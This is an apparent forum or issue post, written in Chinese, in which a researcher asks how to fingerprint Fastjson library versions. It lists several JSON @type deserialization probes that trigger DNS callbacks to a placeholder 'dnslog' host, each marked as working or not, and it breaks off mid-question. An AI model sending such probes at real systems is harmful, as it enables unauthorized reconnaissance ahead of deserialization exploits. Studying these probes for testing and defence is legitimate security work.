Fastjson issues

拜读了师傅的【Fastjson姿势技巧集合】，收获良多。因为是刚开始研究fastjson漏洞，很多内容目前还看不懂，但利用方法真的很实用。目前遇到了一个实际环境，引发了一系列的问题，其中几个属于经验性质的，所以想请教一下师傅。 1、我在实际环境中检测fastjson版本时发现在fastjson >1.2.68大部分都能通过DNSlog回显，是不是这样就判断出fastjson的版本大于 1.2.68而非小于等于1.2.68 ` {"@type":"java.net.Inet4Address","val":"dnslog"} NO {"@type":"java.net.Inet6Address","val":"dnslog"} NO {{"@type":"java.net.URL","val":"dnslog"}:"aaa"} YES {"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""} YES Set[{"@type":"java.net.URL","val":"http://dnslog"}] YES Set[{"@type":"java.net.URL","val":"http://dnslog"} YES {"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}} NO {{"@type":"java.net.URL","val":"http://dnslog"}:0 YES ` 这些判断方法是否可以进行通用型判断？比如 fastjson >1.2.43...

s1g0day